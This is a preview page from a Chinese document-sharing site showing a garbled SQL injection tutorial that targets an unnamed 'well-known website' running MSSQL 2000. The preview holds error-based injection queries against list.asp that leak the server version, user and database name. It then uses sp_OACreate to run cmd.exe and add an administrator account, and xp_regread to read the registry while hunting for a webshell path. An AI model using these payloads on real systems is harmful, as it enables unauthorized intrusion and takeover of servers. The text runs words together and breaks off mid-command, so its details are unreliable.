榨干mssqlserver最后一滴血

榨干mssqlserver最后一滴血

ID:24378069

大小:53.00 KB

页数:3页

时间:2018-11-14

榨干mssqlserver最后一滴血_第1页
榨干mssqlserver最后一滴血_第2页
榨干mssqlserver最后一滴血_第3页
资源描述:

《榨干mssqlserver最后一滴血》由会员上传分享,免费在线阅读,更多相关内容在工程资料-天天文库

1、榨干MSSQLServer最后一滴血>>教育资源库风云变换的网络,网络安全让人们不能不关注它。数据库,让我们不得不想起强大的ORACLE,MSSQL。微软的漏洞最多,今天就用SQLINJECTION来让MSSQL为我们好好的工作。以下(使用一知名网站作为测试点),相信大家对SQL爆库,爆表,爆字段都已掌握,在这里就不多说这方面了。MSSQL内置函数介绍:VERSION获得E()得到当前主机的名称这些信息有助我们对系统进行简单的了解好,下面我们就开始吧!语句:list.asp?classid=1'返

2、回信息:MicrosoftOLEDBProviderforSQLServer错误'80040e14'字符串'OrderByIdDESC'之前有未闭合的引号。/list.asp,行290从这里未闭合的引号(),我们可以确定存在SQLINJECTION。发现在漏洞当然接着走了,利用以上介绍的函数为我们工作了:语句:list.asp?classid=1and0<>(selectversion)返回:MicrosoftOLEDBProviderforSQLServer错

3、误'80040e07'将nvarchar值'MicrosoftSQLServer2000-8.00.760(IntelX86)Dec17200214:22:05Copyright(c)1988-2003MicrosoftCorporationStandardEditiononIN服务器角色成员。说明数据库服务器角色成员组默认是在每个数据库增加一个DBO用户。返回原理根1=1,1=2相似..这里只是权限测试,我们也把它爆出来看看:语句:list.asp?classid=1and0&l

4、t;>(selectuser_name())返回:MicrosoftOLEDBProviderforSQLServer错误'80040e07'将nvarchar值'dbo'转换为数据类型为int的列时发生语法错误。/list.asp,行290说明连接数据库的用户权限很高,可以确定是服务器角色组中的成员。语句:list.asp?classid=1and0<>(selectdb_name())返回:MicrosoftOLEDBProviderforSQLSer

5、ver错误'80040e07'将nvarchar值'GameIMGSys'转换为数据类型为int的列时发生语法错误。/list.asp,行290这样就可以爆出当前的数据库。得到这么高权限的数据库连接成员,我们当然想直接得到IN。NTADMIN取决于当前服务器的配置,如果配置不合理的服务器,我们要直接拿NTADMIN,拿NTADMIN就要用到:MSSQL内置存储过程:sp_OACreate(通过它,危害很得更大,但是需要有SYSADMINS权限才可能使用)sp_OAGetEr

6、rorInfosp_OAGetPropertysp_OAMethodsp_OASetPropertysp_SetPropertysp_OAStop由于MSSQL一次可以执行多语句,使得我们有机会使用更多的语句。语句:list.asp?classid=1;DECLAREshellINTEXECSP_OACREATE'32cmd.exe/cusertestchinatest/add'正常返回。(提示:如果主机上shell存在的话那将在服务器上创建一个test的用户)创建用户了,语句后再加个l

7、ocalgroupadministratorstest/add加到管理组中。如果对方的机子开着3389端口,或IPC的话,那接下来的事,就不用我多说了。遇到专业型主机,只开一个80端口,那应该怎么办呢?当然,我们还是可能拿到AKEASKWEBTASK的工具得到WEBSHELL了。以下推荐,获取网页路径(通过存储过程达到对注册表的读取):利用内置存储过程xp_12下一页>>>>这篇文章来自..,。regread(读取注册表键值,权限public):语句:list.asp?classid=1;CREATETA

8、BLEneaster..xp_regreadrootkey='HKEY_LOCAL_MACHINE',key='SYSTEMCurrentControlSetServicesACHINESYSTEMCurrentControlSetServicesetersVirtualRoots利用爆字段将数据库的值读出来:语句:list.asp?classid=1and0<>(sele

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。